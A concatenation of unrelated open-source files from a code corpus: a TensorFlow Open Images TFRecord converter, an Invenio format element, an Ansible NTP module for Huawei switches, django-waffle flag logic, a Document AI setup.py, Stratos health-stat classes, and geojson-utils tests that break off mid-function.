sys.exit(ServerRunner().main())
| bsd-3-clause |
alexgorban/models | research/object_detection/dataset_tools/create_oid_tf_record.py | 3 | 5198 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Creates TFRecords of Open Images dataset for object detection.
Example usage:
python object_detection/dataset_tools/create_oid_tf_record.py \
--input_box_annotations_csv=/path/to/input/annotations-human-bbox.csv \
--input_image_label_annotations_csv=/path/to/input/annotations-label.csv \
--input_images_directory=/path/to/input/image_pixels_directory \
--input_label_map=/path/to/input/labels_bbox_545.labelmap \
--output_tf_record_path_prefix=/path/to/output/prefix.tfrecord
CSVs with bounding box annotations and image metadata (including the image URLs)
can be downloaded from the Open Images GitHub repository:
https://github.com/openimages/dataset
This script will include every image found in the input_images_directory in the
output TFRecord, even if the image has no corresponding bounding box annotations
in the input_annotations_csv. If input_image_label_annotations_csv is specified,
it will add image-level labels as well. Note that the information of whether a
label is positivelly or negativelly verified is NOT added to tfrecord.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import contextlib2
import pandas as pd
import tensorflow as tf
from object_detection.dataset_tools import oid_tfrecord_creation
from object_detection.dataset_tools import tf_record_creation_util
from object_detection.utils import label_map_util
tf.flags.DEFINE_string('input_box_annotations_csv', None,
'Path to CSV containing image bounding box annotations')
tf.flags.DEFINE_string('input_images_directory', None,
'Directory containing the image pixels '
'downloaded from the OpenImages GitHub repository.')
tf.flags.DEFINE_string('input_image_label_annotations_csv', None,
'Path to CSV containing image-level labels annotations')
tf.flags.DEFINE_string('input_label_map', None, 'Path to the label map proto')
tf.flags.DEFINE_string(
'output_tf_record_path_prefix', None,
'Path to the output TFRecord. The shard index and the number of shards '
'will be appended for each output shard.')
tf.flags.DEFINE_integer('num_shards', 100, 'Number of TFRecord shards')
FLAGS = tf.flags.FLAGS
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
required_flags = [
'input_box_annotations_csv', 'input_images_directory', 'input_label_map',
'output_tf_record_path_prefix'
]
for flag_name in required_flags:
if not getattr(FLAGS, flag_name):
raise ValueError('Flag --{} is required'.format(flag_name))
label_map = label_map_util.get_label_map_dict(FLAGS.input_label_map)
all_box_annotations = pd.read_csv(FLAGS.input_box_annotations_csv)
if FLAGS.input_image_label_annotations_csv:
all_label_annotations = pd.read_csv(FLAGS.input_image_label_annotations_csv)
all_label_annotations.rename(
columns={'Confidence': 'ConfidenceImageLabel'}, inplace=True)
else:
all_label_annotations = None
all_images = tf.gfile.Glob(
os.path.join(FLAGS.input_images_directory, '*.jpg'))
all_image_ids = [os.path.splitext(os.path.basename(v))[0] for v in all_images]
all_image_ids = pd.DataFrame({'ImageID': all_image_ids})
all_annotations = pd.concat(
[all_box_annotations, all_image_ids, all_label_annotations])
tf.logging.log(tf.logging.INFO, 'Found %d images...', len(all_image_ids))
with contextlib2.ExitStack() as tf_record_close_stack:
output_tfrecords = tf_record_creation_util.open_sharded_output_tfrecords(
tf_record_close_stack, FLAGS.output_tf_record_path_prefix,
FLAGS.num_shards)
for counter, image_data in enumerate(all_annotations.groupby('ImageID')):
tf.logging.log_every_n(tf.logging.INFO, 'Processed %d images...', 1000,
counter)
image_id, image_annotations = image_data
# In OID image file names are formed by appending ".jpg" to the image ID.
image_path = os.path.join(FLAGS.input_images_directory, image_id + '.jpg')
with tf.gfile.Open(image_path) as image_file:
encoded_image = image_file.read()
tf_example = oid_tfrecord_creation.tf_example_from_annotations_data_frame(
image_annotations, label_map, encoded_image)
if tf_example:
shard_idx = int(image_id, 16) % FLAGS.num_shards
output_tfrecords[shard_idx].write(tf_example.SerializeToString())
if __name__ == '__main__':
tf.app.run()
| apache-2.0 |
ksachs/invenio | modules/bibformat/lib/elements/bfe_collection.py | 30 | 1404 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibFormat element - Prints collection identifier
"""
__revision__ = "$Id$"
def format_element(bfo, kb):
"""
Prints the collection identifier.
Translate using given knowledge base.
@param kb: a knowledge base use to translate the collection identifier
"""
collection_identifiers = bfo.fields("980__a")
for collection_identifier in collection_identifiers:
translated_collection_identifier = bfo.kb(kb, collection_identifier)
if translated_collection_identifier:
return translated_collection_identifier
return ''
| gpl-2.0 |
onitake/ansible | lib/ansible/modules/network/cloudengine/ce_ntp.py | 7 | 20797 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ce_ntp
version_added: "2.4"
short_description: Manages core NTP configuration on HUAWEI CloudEngine switches.
description:
- Manages core NTP configuration on HUAWEI CloudEngine switches.
author:
- Zhijin Zhou (@QijunPan)
options:
server:
description:
- Network address of NTP server.
peer:
description:
- Network address of NTP peer.
key_id:
description:
- Authentication key identifier to use with given NTP server or peer.
is_preferred:
description:
- Makes given NTP server or peer the preferred NTP server or peer for the device.
choices: ['enable', 'disable']
vpn_name:
description:
- Makes the device communicate with the given
NTP server or peer over a specific vpn.
default: '_public_'
source_int:
description:
- Local source interface from which NTP messages are sent.
Must be fully qualified interface name, i.e. C(40GE1/0/22), C(vlanif10).
Interface types, such as C(10GE), C(40GE), C(100GE), C(Eth-Trunk), C(LoopBack),
C(MEth), C(NULL), C(Tunnel), C(Vlanif).
state:
description:
- Manage the state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: NTP test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Set NTP Server with parameters"
ce_ntp:
server: 192.8.2.6
vpn_name: js
source_int: vlanif4001
is_preferred: enable
key_id: 32
provider: "{{ cli }}"
- name: "Set NTP Peer with parameters"
ce_ntp:
peer: 192.8.2.6
vpn_name: js
source_int: vlanif4001
is_preferred: enable
key_id: 32
provider: "{{ cli }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"server": "2.2.2.2", "key_id": "48",
"is_preferred": "enable", "vpn_name":"js",
"source_int": "vlanif4002", "state":"present"}
existing:
description: k/v pairs of existing ntp server/peer
returned: always
type: dict
sample: {"server": "2.2.2.2", "key_id": "32",
"is_preferred": "disable", "vpn_name":"js",
"source_int": "vlanif4002"}
end_state:
description: k/v pairs of ntp info after module execution
returned: always
type: dict
sample: {"server": "2.2.2.2", "key_id": "48",
"is_preferred": "enable", "vpn_name":"js",
"source_int": "vlanif4002"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["ntp server 2.2.2.2 authentication-keyid 48 source-interface vlanif4002 vpn-instance js preferred"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
import re
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.cloudengine.ce import ce_argument_spec, get_nc_config, set_nc_config
CE_NC_GET_NTP_CONFIG = """
<filter type="subtree">
<ntp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<ntpUCastCfgs>
<ntpUCastCfg>
<addrFamily></addrFamily>
<vpnName></vpnName>
<ifName></ifName>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
<type></type>
<isPreferred></isPreferred>
<keyId></keyId>
</ntpUCastCfg>
</ntpUCastCfgs>
</ntp>
</filter>
"""
CE_NC_MERGE_NTP_CONFIG = """
<config>
<ntp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<ntpUCastCfgs>
<ntpUCastCfg operation="merge">
<addrFamily>%s</addrFamily>
<ipv4Addr>%s</ipv4Addr>
<ipv6Addr>%s</ipv6Addr>
<type>%s</type>
<vpnName>%s</vpnName>
<keyId>%s</keyId>
<isPreferred>%s</isPreferred>
<ifName>%s</ifName>
<neid>0-0</neid>
</ntpUCastCfg>
</ntpUCastCfgs>
</ntp>
</config>
"""
CE_NC_DELETE_NTP_CONFIG = """
<config>
<ntp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<ntpUCastCfgs>
<ntpUCastCfg operation="delete">
<addrFamily>%s</addrFamily>
<ipv4Addr>%s</ipv4Addr>
<ipv6Addr>%s</ipv6Addr>
<type>%s</type>
<vpnName>%s</vpnName>
<neid>0-0</neid>
</ntpUCastCfg>
</ntpUCastCfgs>
</ntp>
</config>
"""
def get_interface_type(interface):
"""Gets the type of interface, such as 10GE, ETH-TRUNK, VLANIF..."""
if interface is None:
return None
iftype = None
if interface.upper().startswith('GE'):
iftype = 'ge'
elif interface.upper().startswith('10GE'):
iftype = '10ge'
elif interface.upper().startswith('25GE'):
iftype = '25ge'
elif interface.upper().startswith('4X10GE'):
iftype = '4x10ge'
elif interface.upper().startswith('40GE'):
iftype = '40ge'
elif interface.upper().startswith('100GE'):
iftype = '100ge'
elif interface.upper().startswith('VLANIF'):
iftype = 'vlanif'
elif interface.upper().startswith('LOOPBACK'):
iftype = 'loopback'
elif interface.upper().startswith('METH'):
iftype = 'meth'
elif interface.upper().startswith('ETH-TRUNK'):
iftype = 'eth-trunk'
elif interface.upper().startswith('VBDIF'):
iftype = 'vbdif'
elif interface.upper().startswith('NVE'):
iftype = 'nve'
elif interface.upper().startswith('TUNNEL'):
iftype = 'tunnel'
elif interface.upper().startswith('ETHERNET'):
iftype = 'ethernet'
elif interface.upper().startswith('FCOE-PORT'):
iftype = 'fcoe-port'
elif interface.upper().startswith('FABRIC-PORT'):
iftype = 'fabric-port'
elif interface.upper().startswith('STACK-PORT'):
iftype = 'stack-Port'
elif interface.upper().startswith('NULL'):
iftype = 'null'
else:
return None
return iftype.lower()
class Ntp(object):
"""Ntp class"""
def __init__(self, argument_spec):
self.spec = argument_spec
self.module = None
self.mutually_exclusive = [('server', 'peer')]
self.init_module()
# ntp configration info
self.server = self.module.params['server'] or None
self.peer = self.module.params['peer'] or None
self.key_id = self.module.params['key_id']
self.is_preferred = self.module.params['is_preferred']
self.vpn_name = self.module.params['vpn_name']
self.interface = self.module.params['source_int'] or ""
self.state = self.module.params['state']
self.ntp_conf = dict()
self.conf_exsit = False
self.ip_ver = 'IPv4'
if self.server:
self.peer_type = 'Server'
self.address = self.server
elif self.peer:
self.peer_type = 'Peer'
self.address = self.peer
else:
self.peer_type = None
self.address = None
self.check_params()
# state
self.changed = False
self.updates_cmd = list()
self.results = dict()
self.proposed = dict()
self.existing = list()
self.end_state = list()
self.init_data()
def init_data(self):
"""Init data"""
if self.interface is not None:
self.interface = self.interface.lower()
if not self.key_id:
self.key_id = ""
if not self.is_preferred:
self.is_preferred = 'disable'
def init_module(self):
"""Init module"""
required_one_of = [("server", "peer")]
self.module = AnsibleModule(
argument_spec=self.spec,
supports_check_mode=True,
required_one_of=required_one_of,
mutually_exclusive=self.mutually_exclusive
)
def check_ipaddr_validate(self):
"""Check ipaddress validate"""
rule1 = r'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])\.'
rule2 = r'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])'
ipv4_regex = '%s%s%s%s%s%s' % ('^', rule1, rule1, rule1, rule2, '$')
ipv6_regex = '^(?:[a-fA-F0-9]{1,4}:){7}[a-fA-F0-9]{1,4}$'
flag = False
if bool(re.match(ipv4_regex, self.address)):
flag = True
self.ip_ver = "IPv4"
if not self.ntp_ucast_ipv4_validate():
flag = False
elif bool(re.match(ipv6_regex, self.address)):
flag = True
self.ip_ver = "IPv6"
else:
flag = True
self.ip_ver = "IPv6"
if not flag:
if self.peer_type == "Server":
self.module.fail_json(msg='Error: Illegal server ip-address.')
else:
self.module.fail_json(msg='Error: Illegal peer ip-address.')
def ntp_ucast_ipv4_validate(self):
"""Check ntp ucast ipv4 address"""
addr_list = re.findall(r'(.*)\.(.*)\.(.*)\.(.*)', self.address)
if not addr_list:
self.module.fail_json(msg='Error: Match ip-address fail.')
value = ((int(addr_list[0][0])) * 0x1000000) + (int(addr_list[0][1]) * 0x10000) + \
(int(addr_list[0][2]) * 0x100) + (int(addr_list[0][3]))
if (value & (0xff000000) == 0x7f000000) or (value & (0xF0000000) == 0xF0000000) \
or (value & (0xF0000000) == 0xE0000000) or (value == 0):
return False
return True
def check_params(self):
"""Check all input params"""
# check interface type
if self.interface:
intf_type = get_interface_type(self.interface)
if not intf_type:
self.module.fail_json(
msg='Error: Interface name of %s '
'is error.' % self.interface)
if self.vpn_name:
if (len(self.vpn_name) < 1) or (len(self.vpn_name) > 31):
self.module.fail_json(
msg='Error: VPN name length is beetween 1 and 31.')
if self.address:
self.check_ipaddr_validate()
def check_response(self, xml_str, xml_name):
"""Check if response message is already succeed."""
if "<ok/>" not in xml_str:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def set_ntp(self, *args):
"""Configure ntp parameters"""
if self.state == 'present':
if self.ip_ver == 'IPv4':
xml_str = CE_NC_MERGE_NTP_CONFIG % (
args[0], args[1], '::', args[2], args[3], args[4], args[5], args[6])
elif self.ip_ver == 'IPv6':
xml_str = CE_NC_MERGE_NTP_CONFIG % (
args[0], '0.0.0.0', args[1], args[2], args[3], args[4], args[5], args[6])
ret_xml = set_nc_config(self.module, xml_str)
self.check_response(ret_xml, "NTP_CORE_CONFIG")
else:
if self.ip_ver == 'IPv4':
xml_str = CE_NC_DELETE_NTP_CONFIG % (
args[0], args[1], '::', args[2], args[3])
elif self.ip_ver == 'IPv6':
xml_str = CE_NC_DELETE_NTP_CONFIG % (
args[0], '0.0.0.0', args[1], args[2], args[3])
ret_xml = set_nc_config(self.module, xml_str)
self.check_response(ret_xml, "UNDO_NTP_CORE_CONFIG")
def config_ntp(self):
"""Config ntp"""
if self.state == "present":
if self.address and not self.conf_exsit:
if self.is_preferred == 'enable':
is_preferred = 'true'
else:
is_preferred = 'false'
self.set_ntp(self.ip_ver, self.address, self.peer_type,
self.vpn_name, self.key_id, is_preferred, self.interface)
self.changed = True
else:
if self.address:
self.set_ntp(self.ip_ver, self.address,
self.peer_type, self.vpn_name, '', '', '')
self.changed = True
def show_result(self):
"""Show result"""
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
if self.changed:
self.results['updates'] = self.updates_cmd
else:
self.results['updates'] = list()
self.module.exit_json(**self.results)
def get_ntp_exist_config(self):
"""Get ntp existed configure"""
ntp_config = list()
conf_str = CE_NC_GET_NTP_CONFIG
con_obj = get_nc_config(self.module, conf_str)
if "<data/>" in con_obj:
return ntp_config
xml_str = con_obj.replace('\r', '').replace('\n', '').\
replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
# get all ntp config info
root = ElementTree.fromstring(xml_str)
ntpsite = root.findall("data/ntp/ntpUCastCfgs/ntpUCastCfg")
for nexthop in ntpsite:
ntp_dict = dict()
for ele in nexthop:
if ele.tag in ["addrFamily", "vpnName", "ifName", "ipv4Addr",
"ipv6Addr", "type", "isPreferred", "keyId"]:
ntp_dict[ele.tag] = ele.text
ip_addr = ntp_dict['ipv6Addr']
if ntp_dict['addrFamily'] == "IPv4":
ip_addr = ntp_dict['ipv4Addr']
if ntp_dict['ifName'] is None:
ntp_dict['ifName'] = ""
if ntp_dict['isPreferred'] == 'true':
is_preferred = 'enable'
else:
is_preferred = 'disable'
if self.state == "present":
key_id = ntp_dict['keyId'] or ""
cur_ntp_cfg = dict(vpn_name=ntp_dict['vpnName'], source_int=ntp_dict['ifName'].lower(), address=ip_addr,
peer_type=ntp_dict['type'], prefer=is_preferred, key_id=key_id)
exp_ntp_cfg = dict(vpn_name=self.vpn_name, source_int=self.interface.lower(), address=self.address,
peer_type=self.peer_type, prefer=self.is_preferred, key_id=self.key_id)
if cur_ntp_cfg == exp_ntp_cfg:
self.conf_exsit = True
vpn_name = ntp_dict['vpnName']
if ntp_dict['vpnName'] == "_public_":
vpn_name = None
if_name = ntp_dict['ifName']
if if_name == "":
if_name = None
if self.peer_type == 'Server':
ntp_config.append(dict(vpn_name=vpn_name,
source_int=if_name, server=ip_addr,
is_preferred=is_preferred, key_id=ntp_dict['keyId']))
else:
ntp_config.append(dict(vpn_name=vpn_name,
source_int=if_name, peer=ip_addr,
is_preferred=is_preferred, key_id=ntp_dict['keyId']))
return ntp_config
def get_existing(self):
"""Get existing info"""
if self.address:
self.existing = self.get_ntp_exist_config()
def get_proposed(self):
"""Get proposed info"""
if self.address:
vpn_name = self.vpn_name
if vpn_name == "_public_":
vpn_name = None
if_name = self.interface
if if_name == "":
if_name = None
key_id = self.key_id
if key_id == "":
key_id = None
if self.peer_type == 'Server':
self.proposed = dict(state=self.state, vpn_name=vpn_name,
source_int=if_name, server=self.address,
is_preferred=self.is_preferred, key_id=key_id)
else:
self.proposed = dict(state=self.state, vpn_name=vpn_name,
source_int=if_name, peer=self.address,
is_preferred=self.is_preferred, key_id=key_id)
def get_end_state(self):
"""Get end state info"""
if self.address:
self.end_state = self.get_ntp_exist_config()
def get_update_cmd(self):
"""Get updated commands"""
if self.conf_exsit:
return
cli_str = ""
if self.state == "present":
if self.address:
if self.peer_type == 'Server':
if self.ip_ver == "IPv4":
cli_str = "%s %s" % (
"ntp unicast-server", self.address)
else:
cli_str = "%s %s" % (
"ntp unicast-server ipv6", self.address)
elif self.peer_type == 'Peer':
if self.ip_ver == "IPv4":
cli_str = "%s %s" % ("ntp unicast-peer", self.address)
else:
cli_str = "%s %s" % (
"ntp unicast-peer ipv6", self.address)
if self.key_id:
cli_str = "%s %s %s" % (
cli_str, "authentication-keyid", self.key_id)
if self.interface:
cli_str = "%s %s %s" % (
cli_str, "source-interface", self.interface)
if (self.vpn_name) and (self.vpn_name != '_public_'):
cli_str = "%s %s %s" % (
cli_str, "vpn-instance", self.vpn_name)
if self.is_preferred == "enable":
cli_str = "%s %s" % (cli_str, "preferred")
else:
if self.address:
if self.peer_type == 'Server':
if self.ip_ver == "IPv4":
cli_str = "%s %s" % (
"undo ntp unicast-server", self.address)
else:
cli_str = "%s %s" % (
"undo ntp unicast-server ipv6", self.address)
elif self.peer_type == 'Peer':
if self.ip_ver == "IPv4":
cli_str = "%s %s" % (
"undo ntp unicast-peer", self.address)
else:
cli_str = "%s %s" % (
"undo ntp unicast-peer ipv6", self.address)
if (self.vpn_name) and (self.vpn_name != '_public_'):
cli_str = "%s %s" % (cli_str, self.vpn_name)
self.updates_cmd.append(cli_str)
def work(self):
"""Excute task"""
self.get_existing()
self.get_proposed()
self.config_ntp()
self.get_update_cmd()
self.get_end_state()
self.show_result()
def main():
"""Main function entry"""
argument_spec = dict(
server=dict(type='str'),
peer=dict(type='str'),
key_id=dict(type='str'),
is_preferred=dict(type='str', choices=['enable', 'disable']),
vpn_name=dict(type='str', default='_public_'),
source_int=dict(type='str'),
state=dict(choices=['absent', 'present'], default='present'),
)
argument_spec.update(ce_argument_spec)
ntp_obj = Ntp(argument_spec)
ntp_obj.work()
if __name__ == '__main__':
main()
| gpl-3.0 |
styleseat/django-waffle | waffle/__init__.py | 1 | 3408 | from decimal import Decimal
import random
import django
from waffle.utils import get_setting
VERSION = (0, 10, 1)
__version__ = '.'.join(map(str, VERSION))
def set_flag(request, flag_name, active=True, session_only=False):
"""Set a flag value on a request object."""
if not hasattr(request, 'waffles'):
request.waffles = {}
request.waffles[flag_name] = [active, session_only]
def flag_is_active(request, flag_name):
from .models import Flag, get_flag_group_ids, get_flag_user_ids
try:
flag = Flag.objects.get(name=flag_name)
except Flag.DoesNotExist:
return get_setting('FLAG_DEFAULT')
if get_setting('OVERRIDE'):
if flag_name in request.GET:
return request.GET[flag_name] == '1'
if flag.everyone:
return True
elif flag.everyone is False:
return False
if flag.testing: # Testing mode is on.
tc = get_setting('TEST_COOKIE') % flag_name
if tc in request.GET:
on = request.GET[tc] == '1'
if not hasattr(request, 'waffle_tests'):
request.waffle_tests = {}
request.waffle_tests[flag_name] = on
return on
if tc in request.COOKIES:
return request.COOKIES[tc] == 'True'
user = request.user
if flag.authenticated and user.is_authenticated():
return True
if flag.staff and user.is_staff:
return True
if flag.superusers and user.is_superuser:
return True
if flag.languages:
languages = flag.languages.split(',')
if (hasattr(request, 'LANGUAGE_CODE') and
request.LANGUAGE_CODE in languages):
return True
flag_user_ids = get_flag_user_ids(flag)
if user.id in flag_user_ids:
return True
flag_group_ids = get_flag_group_ids(flag)
if len(flag_group_ids) > 0:
try:
user_group_ids = set(user.groups.all().values_list('id', flat=True))
except AttributeError:
django_version = django.VERSION
if django_version[0] != 1 or django_version[1] > 5:
raise
else:
if len(user_group_ids & flag_group_ids) > 0:
return True
if flag.percent and flag.percent > 0:
if not hasattr(request, 'waffles'):
request.waffles = {}
elif flag_name in request.waffles:
return request.waffles[flag_name][0]
cookie = get_setting('COOKIE') % flag_name
if cookie in request.COOKIES:
flag_active = (request.COOKIES[cookie] == 'True')
set_flag(request, flag_name, flag_active, flag.rollout)
return flag_active
if Decimal(str(random.uniform(0, 100))) <= flag.percent:
set_flag(request, flag_name, True, flag.rollout)
return True
set_flag(request, flag_name, False, flag.rollout)
return False
def switch_is_active(switch_name):
from .models import Switch
try:
return Switch.objects.get(name=switch_name).active
except Switch.DoesNotExist:
return get_setting('SWITCH_DEFAULT')
def sample_is_active(sample_name):
from .models import Sample
try:
sample = Sample.objects.get(name=sample_name)
except Sample.DoesNotExist:
return get_setting('SAMPLE_DEFAULT')
return Decimal(str(random.uniform(0, 100))) <= sample.percent
| bsd-3-clause |
googleapis/python-documentai | setup.py | 1 | 2078 | # -*- coding: utf-8 -*-
# Copyright (C) 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import io
import os
import setuptools # type: ignore
version = "0.5.0"
package_root = os.path.abspath(os.path.dirname(__file__))
readme_filename = os.path.join(package_root, "README.rst")
with io.open(readme_filename, encoding="utf-8") as readme_file:
readme = readme_file.read()
setuptools.setup(
name="google-cloud-documentai",
version=version,
long_description=readme,
author="Google LLC",
author_email="googleapis-packages@google.com",
license="Apache 2.0",
url="https://github.com/googleapis/python-documentai",
packages=[
package
for package in setuptools.PEP420PackageFinder.find()
if package.startswith("google")
],
namespace_packages=("google", "google.cloud"),
platforms="Posix; MacOS X; Windows",
include_package_data=True,
install_requires=(
"google-api-core[grpc] >= 1.22.2, < 2.0.0dev",
"proto-plus >= 1.10.0",
"packaging >= 14.3",
),
python_requires=">=3.6",
setup_requires=["libcst >= 0.2.5"],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
],
zip_safe=False,
)
| apache-2.0 |
agentmilindu/stratos | components/org.apache.stratos.python.cartridge.agent/src/main/python/cartridge.agent/cartridge.agent/modules/healthstatspublisher/abstracthealthstatisticspublisher.py | 2 | 1992 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
class AbstractHealthStatisticsReader:
"""
Abstract class to implement to create a custom health stat reader
"""
def stat_cartridge_health(self):
"""
Abstract method that when implemented reads the memory usage and the load average
of the instance running the agent and returns a CartridgeHealthStatistics object
with the information
:return: CartridgeHealthStatistics object with memory usage and load average values
:rtype : CartridgeHealthStatistics
"""
raise NotImplementedError
class CartridgeHealthStatistics:
"""
Holds the memory usage and load average reading
"""
def __init__(self):
self.memory_usage = None
""":type : float"""
self.load_avg = None
""":type : float"""
class CEPPublisherException(Exception):
"""
Exception to be used during CEP publishing operations
"""
def __init__(self, msg):
Exception.__init__(self, msg)
self.message = msg
def get_message(self):
"""
The message provided when the exception is raised
:return: message
:rtype: str
"""
return self.message
| apache-2.0 |
brandonxiang/geojson-python-utils | test.py | 1 | 5920 | from __future__ import print_function
import unittest
import json
import math
class Test(unittest.TestCase):
def test_linestrings_intersect(self):
from geojson_utils import linestrings_intersect
diagonal_up_str = '{ "type": "LineString","coordinates": [[0, 0], [10, 10]]}'
diagonal_down_str = '{ "type": "LineString","coordinates": [[10, 0], [0, 10]]}'
far_away_str = '{ "type": "LineString","coordinates": [[100, 100], [110, 110]]}'
diagonal_up = json.loads(diagonal_up_str)
diagonal_down = json.loads(diagonal_down_str)
far_away = json.loads(far_away_str)
self.assertEqual(linestrings_intersect(diagonal_up, diagonal_down), [{'type': 'Point', 'coordinates': [5, 5]}])
self.assertEqual(linestrings_intersect(diagonal_up, far_away), [])
def test_point_in_polygon(self):
from geojson_utils import point_in_polygon
in_str = '{"type": "Point", "coordinates": [5, 5]}'
out_str = '{"type": "Point", "coordinates": [15, 15]}'
box_str = '{"type": "Polygon","coordinates": [[ [0, 0], [10, 0], [10, 10], [0, 10] ]]}'
in_box = json.loads(in_str)
out_box = json.loads(out_str)
box = json.loads(box_str)
self.assertTrue(point_in_polygon(in_box, box))
self.assertFalse(point_in_polygon(out_box, box))
def test_point_in_multipolygon(self):
from geojson_utils import point_in_multipolygon
point_str = '{"type": "Point", "coordinates": [0.5, 0.5]}'
single_point_str = '{"type": "Point", "coordinates": [-1, -1]}'
multipoly_str = '{"type":"MultiPolygon","coordinates":[[[[0,0],[0,10],[10,10],[10,0],[0,0]]],[[[10,10],[10,20],[20,20],[20,10],[10,10]]]]}'
point = json.loads(point_str)
single_point = json.loads(single_point_str)
multipoly = json.loads(multipoly_str)
self.assertTrue(point_in_multipolygon(point, multipoly))
self.assertFalse(point_in_multipolygon(single_point, multipoly))
def test_drawCircle(self):
from geojson_utils import draw_circle
pt_center = json.loads('{"type": "Point", "coordinates": [0, 0]}')
self.assertEqual(
len(draw_circle(10, pt_center)['coordinates'][0]), 15)
self.assertEqual(
len(draw_circle(10, pt_center, 50)['coordinates'][0]), 50)
def test_rectangle_centroid(self):
from geojson_utils import rectangle_centroid
box_str = '{"type": "Polygon","coordinates": [[[0, 0],[10, 0],[10, 10],[0, 10]]]}'
box = json.loads(box_str)
centroid = rectangle_centroid(box)
self.assertEqual(centroid['coordinates'], [5, 5])
def test_point_distance(self):
from geojson_utils import point_distance
fairyland_str = '{"type": "Point", "coordinates": [-122.260000705719, 37.80919060818706]}'
navalbase_str = '{"type": "Point", "coordinates": [-122.32083320617676, 37.78774223089045]}'
fairyland = json.loads(fairyland_str)
navalbase = json.loads(navalbase_str)
self.assertEqual(math.floor(
point_distance(fairyland, navalbase)), 5852)
def test_geometry_radius(self):
from geojson_utils import geometry_within_radius
center_point_str = '{"type": "Point", "coordinates": [-122.260000705719, 37.80919060818706]}'
check_point_str = '{"type": "Point", "coordinates": [-122.32083320617676, 37.78774223089045]}'
center_point = json.loads(center_point_str)
check_point = json.loads(check_point_str)
self.assertTrue(geometry_within_radius(check_point, center_point, 5853))
def test_area(self):
from geojson_utils import area
box_str = '{"type": "Polygon","coordinates": [[ [0, 0], [10, 0], [10, 10], [0, 10] ]]}'
box = json.loads(box_str)
self.assertEqual(area(box), 100)
def test_centroid(self):
from geojson_utils import centroid
box_str = '{"type": "Polygon","coordinates": [[ [0, 0], [10, 0], [10, 10], [0, 10] ]]}'
box = json.loads(box_str)
self.assertEqual(centroid(box), {"type": "Point", "coordinates": [5, 5]})
def test_destination_point(self):
from geojson_utils import destination_point
startpoint_str = '{"type": "Point", "coordinates": [-122.260000705719, 37.80919060818706]}'
startpoint = json.loads(startpoint_str)
